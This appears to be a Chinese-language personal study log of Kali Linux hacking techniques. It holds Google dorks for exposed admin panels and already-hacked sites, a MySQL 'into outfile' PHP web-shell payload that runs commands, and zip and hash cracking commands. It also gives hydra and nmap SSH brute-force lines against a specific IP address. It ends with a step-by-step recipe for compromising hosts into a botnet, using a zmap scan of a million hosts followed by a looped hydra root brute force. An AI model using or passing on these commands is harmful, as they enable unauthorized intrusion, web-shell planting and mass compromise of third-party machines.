文章目录

kali Linux 的一些学习记录

··· kali linux 的一些学习记录 部分无法分类 或者无法单独写成一篇的记录到本篇

google hack

//google根据title 查找常用管理工具的网站 如 jenkins xampp phpadmin zabbix 等等 
1.查询jenkins面板的url  inurl:8080 intitle:"Dashboard[Jenkins]"
2.寻找安装xampp主机 inurl:"xampp/index" intext:"XAMPP for Windows" //目标系统windows
3.查找已经被入侵过的网站 intitle:"=[ 1n73ct10n privat shell ]
="intitle:"WSO 2.4" [ Sec. Info ], [ Files ], [ Console ], [ Sql ], [ Php ], [ Safe mode ], [ String tools ], [ Bruteforce ], [ Network ], [ Self remove ]"

一句话木马

文件上传
//见本人csdn博客
https://blog.csdn.net/onepieceyuan/article/details/54946478
数据库插入
通过mysql的root权限插入一句话木马进行提权
1.新建一张表aa 字段text //不一定需要新建表可以直接插入对应的值,后面根据sql将代码查询出就行
2.插入内容 '<pre><body bgcolor="silver">? @system($_GET["cmd"])</body></pre>'  //一句话调用php函数调用系统命令
3.将一句话木马刷新到磁盘 select * into outfile '/var/html/www/aa.php' from aa
4.访问 http://xxx.com/aa.php?cmd='useradd young' 操作命令 进行提权

密码学

//常用密码破解技术
彩虹表
混合攻击
暴力破解  

//破解密码思路
1.识别加密类型
2.较短的密码使用暴力破解(4位) 尝试常用密码
3.混合暴力破解(彩虹表等)
4.gpu 僵尸网络 集成电路 分布式

离线破解
locate wordlist.txt //查找本机存在的字典 密码字典等


crunch //生成字典

statsgen /usr/share/sqlmap/txt/wordlist.txt //分析字典 包括包含密码长度 组合占用比例等
文件密码破解
///文件密码破解

fcrackzip  -D -p /usr/share/sqlmap/txt/wordlist.txt  -u frp2.zip  //离线破解frp2.zip 指定密码字典为 /usr/share/sqlmap/txt/wordlist.txt

fcrackzip -b -l 1-5 -u frp.zip  //离线破解 -b 暴力破解 -l 限制密码长度1-5位    注意最少就需要加上密码长度限制 否则会很慢(基本猜不出来 指定10位左右的长度比较合适)
PASSWORD FOUND!!!!: pw == yuan

hashcat

彩虹表
//彩虹表 
http://www.ha97.com/4009.html

本人理解 已知加密hash 彩虹表保存了明文对应的hash 对比hash 得出明文 当然彩虹表破解会比较快 本地资源有限不做尝试

转:
暴力破解:完全不知道密码----通过系统提供的认证接口不断认证----获取原始口令----处于进入系统前

彩虹表攻击:已知密码hash值----通过自己的工具及彩虹表不断查找----获取原始口令----处理进入系统后
在线破解
findmyhash md5 -h ff9830c42660c1dd1942844f8069b74a //查询各大网站的密文 ff9830c42660c1dd1942844f8069b74a为密文
远程爆破
hydra //在线破解
hydra -L user -P /usr/share/nmap/nselib/data/passwords.lst -t 1 -vV -e ns 23.110.64.125 ssh //指定用户文件为user(root) 密码文件为pass(密码明文 yuan) -l指定用户

nmap    --script=ssh-brute 23.110.64.125 //暴力破解ssh 这个很无语 破解后不会立即停止 会一直等待脚本跑完后才会结束 有兴趣可以看下脚本 /usr/share/nmap/scripts/ssh-brute.nse 密码字典/usr/share/nmap/nselib/data/passwords.lst

获取网络肉鸡
// 获取肉鸡步骤 zmap 找出开启22端口的主机 形成列表 ---hydra远程连接主机 --指定用户文件(-L),指定密码字典(-P) 指定主机列表(-M) --输出结果到文件(-o)

zmap -B 20M -p 22 -n 1000000 -o ip-list.txt -b /etc/zmap/blacklist.conf  -s 889

while read line;do hydra -l root -P /usr/share/nmap/nselib/data/passwords.lst  -o ip-list-rouji.log -t 16 -vV -e ns $line ssh ;done < ip-list.txt //线程数设置为16 太大容易报错连接错误